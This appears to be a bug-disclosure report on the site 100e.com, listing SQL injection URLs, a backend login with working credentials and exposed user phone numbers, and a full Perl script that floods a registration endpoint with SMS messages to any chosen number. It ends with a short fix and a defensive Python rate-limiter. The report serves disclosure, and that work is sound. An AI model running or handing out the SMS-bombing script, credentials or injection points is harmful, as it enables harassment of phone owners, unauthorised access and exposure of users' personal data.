Summary: multiple security vulnerabilities could leak the sensitive information of a million users.
http://edu.100e.com/course/instance?id=4091
http://space.100e.com/myspace/MyDiaryList.asp?username=admin
Both are SQL injection points.
http://admin.100e.com is the backend.
The login box is vulnerable to POST injection.
U: 0001 P: 111 gets in.
What is in the backend? The phone numbers of 8.7W (about 87,000) users, which is quite something.
The backend is injectable as well.
It seems the whole site is injectable wherever the database is queried.
I did not take a shell, since going further could look like dumping the database.
Then there is a powerful SMS flooding (DDoS) interface: the SMS verification step of registration.
I wrote a Perl script to test it; it works well.
# Sends $i POST requests to the registration SMS endpoint for number $dh
use strict;
use LWP::Simple;
require LWP::UserAgent;
my $url = 'http://passport.100e.com/register/new/step_mobile.aspx';
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
print "Enter the mobile phone number to attack: ";
my $dh = <STDIN>;
chomp $dh;
print "Enter the number of attacks: ";
my $i = <STDIN>;
chomp $i;
for (my $a = 1; $a <= $i; $a++)
{
    my $response = $ua->post($url,
        ['postback' => 'postback',
         'mobile'   => "$dh"]
    );
    print "$a sent\n";
}
Solution:
Filter input at the injection points, and add a time-interval limit to SMS verification.
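One way to implement the time limit suggested above, as an added example that is not part of the original report or the site's own code: a per-number cooldown plus per-number and per-IP caps in front of the "send verification SMS" action, with a replay of the script's tight loop to show how many messages would actually go out. The policy values, phone number and client address are constructed for the example.

```python
import time
from collections import defaultdict, deque

# Policy values are assumptions for this example, not taken from the report.
COOLDOWN_SECONDS = 60        # minimum gap between two codes to the same number
MAX_PER_NUMBER_PER_DAY = 5   # daily cap per phone number
MAX_PER_IP_PER_HOUR = 20     # hourly cap per client address

class SmsThrottle:
    """Gate in front of 'send verification SMS'. State is in-memory here;
    a real deployment would keep it in a shared store."""
    def __init__(self, clock=time.time):
        self.clock = clock
        self.per_number = defaultdict(deque)   # number -> send times (24h)
        self.per_ip = defaultdict(deque)       # client ip -> send times (1h)

    @staticmethod
    def _prune(q, now, window):
        while q and now - q[0] >= window:      # forget sends outside the window
            q.popleft()

    def allow(self, number, client_ip):
        """Return (allowed, reason); the send is recorded only when allowed."""
        now = self.clock()
        nq, iq = self.per_number[number], self.per_ip[client_ip]
        self._prune(nq, now, 86400)
        self._prune(iq, now, 3600)
        if nq and now - nq[-1] < COOLDOWN_SECONDS:
            return False, "cooldown"
        if len(nq) >= MAX_PER_NUMBER_PER_DAY:
            return False, "daily-cap"
        if len(iq) >= MAX_PER_IP_PER_HOUR:
            return False, "ip-cap"
        nq.append(now)
        iq.append(now)
        return True, "sent"

def simulate_flood(attempts, interval=1):
    """Replay a tight loop like the Perl script's (one POST every `interval`
    seconds to one number from one IP); returns how many SMS actually go out."""
    clock = [0]   # fake clock in a list so the lambda sees each advance
    gate = SmsThrottle(lambda: clock[0])
    sent = 0
    for _ in range(attempts):
        ok, _reason = gate.allow("13800000000", "198.51.100.7")  # constructed
        sent += ok
        clock[0] += interval
    return sent
```

With the assumed policy, 100 requests one second apart result in only two messages, and 500 requests stop at the daily cap of five.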